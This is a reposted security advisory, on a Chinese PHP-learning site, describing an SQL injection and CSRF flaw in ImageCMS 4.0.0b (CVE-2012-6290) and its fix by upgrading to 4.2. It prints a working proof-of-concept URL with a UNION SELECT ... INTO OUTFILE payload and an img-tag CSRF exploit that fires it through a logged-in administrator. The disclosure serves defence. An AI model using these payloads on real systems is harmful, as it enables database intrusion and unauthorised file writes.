网站地图    收藏   

主页 > 后端 > 网站安全 >

ImageCMS 4.0.0b多重缺陷及修复 - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 影响产品: ImageCMS开发者: www.imagecms.net影响版本:4.0.0b 及以前Tested Version: 4.0.0b缺陷类型: SQL Injection [CWE-89]状态: 官方已修复Discovered and Provided: High-Tech Bridge Secur......

影响产品: ImageCMS 

开发者: www.imagecms.net

影响版本:4.0.0b 及以前Tested Version: 4.0.0b 

缺陷类型: SQL Injection [CWE-89] 

状态: 官方已修复

Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )  

  High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks. 

  1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290 

  

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database. 

  

Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside: 

  http://www.2cto.com /admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202 

 This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit.  

  

Basic CSRF exploit 示例  

  

<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202"> 

  解决方案: 

  升级至 ImageCMS 4.2 

  

More Information: 

http://forum.imagecms.net/viewtopic.php?id=1436

http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

  

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论